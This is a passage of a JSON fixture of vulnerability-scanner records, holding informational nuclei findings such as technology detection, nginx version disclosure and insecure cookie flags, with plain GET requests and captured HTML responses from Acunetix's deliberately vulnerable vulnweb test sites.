traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 7, + 8, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 63, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/forgotpw'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/forgotpw", + "discovered_date": "2024-11-13T02:34:39.982Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /forgotpw HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 64, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.51' 'http://testhtml5.vulnweb.com/.carousel'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/.carousel", + "discovered_date": "2024-11-13T02:34:40.068Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.carousel HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.51\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 NOT FOUND\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 65, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:47.0) Gecko/20100101 Firefox/47.0' 'http://testhtml5.vulnweb.com/samples'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/samples", + "discovered_date": "2024-11-13T02:34:40.186Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /samples HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:47.0) Gecko/20100101 Firefox/47.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n "http://www.w3.org/TR/html4/loose.dtd">\n<html>\n<head>\n <title>Python samples</title>\n</head>\n<body>\n <h3>Simple python programs:</h3>\n <ul>\n <li><a href="/getfile?fname=sample1.py">First sample</a></li>\n <li><a href="/getfile?fname=sample1.py">Second sample</a></li>\n </ul>\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 66, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:34:40.293Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 67, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33' 'http://testhtml5.vulnweb.com/ajax/archive'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/ajax/archive", + "discovered_date": "2024-11-13T02:34:40.371Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /ajax/archive HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 2\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n[]", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 68, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_13_7) AppleWebKit/570.18 (KHTML, like Gecko) Version/13.0 Safari/570.18' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:34:40.477Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_13_7) AppleWebKit/570.18 (KHTML, like Gecko) Version/13.0 Safari/570.18\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 69, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/cookies-without-secure.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/cookies-without-secure", + "template_id": "cookies-without-secure", + "matcher_name": "", + "name": "Cookies without Secure attribute - Detect", + "severity": 0, + "description": "Checks whether cookies in the HTTP response contain the Secure attribute. If the Secure flag is set, it means that the cookie can only be transmitted over HTTPS\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://owasp.org/www-community/controls/SecureCookieAttribute']", + "cvss_metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:34:40.576Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:32 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=yqqlv5rvfxxko131fkruqp55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(28) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(28) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(29) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a 